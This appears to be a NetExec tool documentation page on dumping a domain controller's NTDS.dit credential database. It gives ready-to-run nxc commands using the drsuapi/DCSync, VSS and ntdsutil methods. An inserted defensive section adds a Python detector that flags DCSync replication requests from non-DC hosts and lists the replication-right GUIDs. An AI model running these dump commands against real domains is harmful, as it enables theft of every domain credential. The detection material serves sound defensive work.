Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin privileges on the target Domain Controller

2 methods are available:
  drsuapi (default) - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resultant linked-lists into a readable format
  vss - Uses the Volume Shadow Copy Service

#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

You can also DCSYNC with the computer account of the DC
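
For defenders, the drsuapi method and the DC computer account variant above both appear in the DC's Security log as Event ID 4662 requests for the replication extended rights. The following is an added example, not NetExec code: it correlates 4662 with 4624 logons over constructed sample events and flags replication requests whose source address is not in an assumed DC inventory (`KNOWN_DC_IPS`), which also catches a DC machine account used from another host. It assumes Directory Service Access auditing is enabled; `ev`, `find_suspicious_replication` and all addresses other than 192.168.1.100 are hypothetical.

```python
import re

# Extended-right GUIDs requested during directory replication (DCSync).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # ...-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
KNOWN_DC_IPS = {"192.168.1.100", "192.168.1.101"}  # assumed DC inventory

def ev(event_id, user, logon_id, **extra):
    """Build one constructed record using the 4624/4662 field names."""
    if event_id == 4624:
        return {"EventID": 4624, "TargetUserName": user, "TargetLogonId": logon_id, **extra}
    return {"EventID": 4662, "SubjectUserName": user, "SubjectLogonId": logon_id, **extra}

# Control Access on the domain object, requesting Get-Changes-All.
GET_ALL = "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"

EVENTS = [  # constructed sample, in log order
    ev(4624, "DC02$", "0x1a2b", IpAddress="192.168.1.101"),    # genuine DC peer
    ev(4662, "DC02$", "0x1a2b", Properties=GET_ALL),
    ev(4624, "UserNAme", "0x3c4d", IpAddress="192.168.1.50"),  # admin from a workstation
    ev(4662, "UserNAme", "0x3c4d", Properties=GET_ALL),
    ev(4624, "DC01$", "0x5e6f", IpAddress="192.168.1.50"),     # DC machine account, non-DC host
    ev(4662, "DC01$", "0x5e6f", Properties=GET_ALL),
    ev(4662, "svc_backup", "0x7777", Properties="%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"),
]

def find_suspicious_replication(events, dc_ips):
    """Return (account, source_ip) for replication requests not sourced from a DC."""
    logon_ip, alerts = {}, []
    for e in events:
        if e["EventID"] == 4624:
            logon_ip[e["TargetLogonId"]] = e["IpAddress"]
        elif e["EventID"] == 4662:
            guids = {g.lower() for g in GUID_RE.findall(e["Properties"])}
            if not guids & REPL_GUIDS:
                continue  # ordinary object access, not replication
            ip = logon_ip.get(e["SubjectLogonId"])  # None if the logon was not seen
            if ip not in dc_ips:  # account name alone is not trusted
                alerts.append((e["SubjectUserName"], ip))
    return alerts

if __name__ == "__main__":
    for account, ip in find_suspicious_replication(EVENTS, KNOWN_DC_IPS):
        print(f"replication request by {account} from {ip}")
```

Keying on source address rather than account name is what lets the `DC01$` request be flagged; a filter that excludes all `$` accounts would miss it.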

There is also the ntdsutil module, which uses ntdsutil to dump NTDS.dit and the SYSTEM hive and parses them locally with secretsdump.py

#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil

Remember to play this music every time you get DA
